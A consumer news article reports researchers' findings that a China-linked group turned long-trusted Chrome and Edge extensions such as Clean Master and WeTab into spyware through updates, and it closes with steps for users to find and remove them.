Your Trusted Browser Extensions Just Became Chinese Spyware

Your browser extensions just became surveillance tools for Chinese hackers. Over 4.3 million users discovered their trusted add-ons were secretly recording every click, search, and website visit in real time. Extensions like Clean Master and WeTab—tools people relied on for years—quietly transformed into spyware through routine updates that felt as normal as any software refresh.

The Long Con That Fooled Everyone

ShadyPanda spent years building trust before weaponizing popular extensions through malicious updates.

Researchers at Koi Security uncovered ShadyPanda’s patient strategy of acquiring legitimate browser extensions, then waiting years before weaponizing them. Rather than risk detection with suspicious new submissions, the China-based group updated existing extensions that had earned millions of downloads since 2018. Clean Master alone compromised 200,000 Chrome users, while WeTab infected roughly 3 million Edge browsers. Like a sleeper cell activation, these updates happened through the same auto-update pipeline you trust for security patches.

Every Click Became Intelligence

The malware captured comprehensive browsing behavior and enabled complete browser takeover.

Once updated, these extensions contacted attacker-controlled domains to download arbitrary JavaScript with full browser access. Your complete digital footprint—every URL visited, search query typed, cookie stored, even mouse movements—streamed encrypted to Chinese servers. The spyware essentially turned each infected browser into a remote-controlled platform, giving hackers the same access you have to your own browsing session.

Store Security Theater Failed

Official marketplaces prioritized initial review over continuous monitoring of trusted extensions.

ShadyPanda exploited a critical gap in how Chrome and Edge stores operate. While platforms rigorously vet new submissions, they provide minimal oversight of updates to established extensions. Extensions sporting “Featured” or “Verified” badges became perfect vehicles for stealth attacks. Users reasonably trusted that official stores would catch malicious behavior, but the security theater focused on the wrong stage of the extension lifecycle.

Check Your Browser Right Now

Immediate action required to identify and remove compromised extensions.

Navigate to chrome://extensions/ or edge://extensions/ and enable Developer Mode to reveal each extension’s ID. Compare these against Koi Security’s published ShadyPanda list and immediately remove any matches. The infected extensions remained active on official stores until researchers exposed the campaign. Change your important passwords as a precaution—assume everything you browsed while infected was captured.